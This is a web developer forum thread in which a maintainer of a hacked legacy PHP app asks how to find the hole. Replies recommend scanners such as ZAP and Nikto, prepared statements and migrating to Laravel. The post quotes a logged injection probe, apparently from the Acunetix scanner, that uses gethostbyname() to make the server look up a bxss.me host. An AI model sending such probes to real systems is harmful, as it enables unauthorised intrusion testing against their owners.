Level 8
It's been scanned by Acunetix, a pentest tool, and the domain bxss.me is from Acunetix.
1 like
Mar 23, 2021
7
Level 25
SQL injection attacks
Hi Lara peeps
I know this isn't really laravel related but I have a legacy app I am working on which has been hacked I am seeing query strings like this:
?exp_slug=".gethostbyname(lc("hitox"."axwtshsj065b3.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(78).chr(111).chr(65)."&exp_slugs=73rk535&tmcs=6dwkqvu&tmcv=36&tmrl=civ0lus&tmsb=at9zrcl&tmsl=email-capture-popover&tmty=w
I know gethostbyname is a linux function to return ip and host info and can only assume the app in question had undergone some sort of sql injection attack as there are a number of gibberish records added to a couple of the database tables.
I am in the process of moving the whole thing over to a new Laravel app but the powers that be keep sidelining it .
I am not sure where to begin finding the security hole - it was hacked in the same way several months ago and I discovered there was a number of crons sat in the public folder that spoofed the admin session in order to run I moved those to a private off root directory and assumed that was the cause but now I have no clue.
Any help pointing me in the right direction would be greatly appreciated.
Level 8
You might scan it using Acunetix to see what it's getting but it's a bit expensive. You can also use other open-source tools but I believe you still need professional assistance.
1 like
Level 25
Thanks yep I did spot that too - do you have any suggestions of open source tools that could help?
I am thinking of a blanket $_POST & $_GET sanitization not entirely sure where to start something like:
$_POST = array_map('sanitize_input',$_POST);
Level 8
I don't think you can secure a whole system with quick dirty tricks like that. Security doesn't work that way. Buying an expensive WAF (Web Application Firewall) wouldn't cut it either. Migrating to Laravel and vigilance is your best hope.
You can start with ZAP (Zed Attack Proxy) or Nikto, They are great open-source tools and my favorites.
Good Luck
Level 73
You should always use prepared statements .
Not knowing if you use mysqli or pdo it's tricky to give advice.
Mysqli: https://medium.com/@mohsinyounas05/different-ways-to-prevent-sql-injection-in-php-cfe03db913bc
PDO: https://websitebeaver.com/php-pdo-prepared-statements-to-prevent-sql-injection
Level 25
Thanks I agree but this is an inherited legacy procedural PHP with thousands of SQL statements I am just trying to find a quick and dirty way to shore it up while I port it over to a Laravel app I really don't want to spend much time on it as its being replaced.
Level 75
Laravel has getPdo(), so you could fairly quickly convert to Laravel yet still use regular queries. But do bind the parameters.
Please or to participate in this conversation.